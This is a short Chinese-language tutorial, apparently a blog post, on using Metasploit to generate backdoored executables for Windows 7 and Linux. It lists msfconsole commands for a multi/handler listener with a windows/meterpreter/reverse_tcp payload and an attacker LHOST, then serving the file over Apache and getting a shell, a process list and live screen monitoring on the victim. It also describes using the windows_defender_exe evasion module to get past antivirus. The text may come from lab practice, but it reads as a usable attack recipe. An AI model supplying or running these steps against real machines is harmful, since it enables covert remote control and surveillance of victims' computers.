msf生成软件
生成软件后门程序的命令

win7获取
生成内网软件

启动kali上的http服务
systemctl start apache2

开始msf控制台
msfconsole
使用监听模块 并查看配置 show options
use exploit/multi/handler

配置payload
set payload windows/meterpreter/reverse_tcp

查看参数

配置本地接受IP
set LHOST 192.168.19.136

开始监听

在win7上运行下载好的test.exe

系统弹出警告窗口,点击运行。

获得到shell查看id,ps进程

下面这段呢是打开一个监控窗口

效果是这样的 这是win7的界面

这个窗口是实时的

使用模块生成软件 evasion

使用win下模块 windows_defender_exe

配置payload

生成软件

配置监听

配置payload

运行

制作linux下的可执行文件,操作方法同上

这里主要有一个坑,使用payload要用 linux/x86/meterpreter/reverse_tcp

浙公网安备 33010602011771号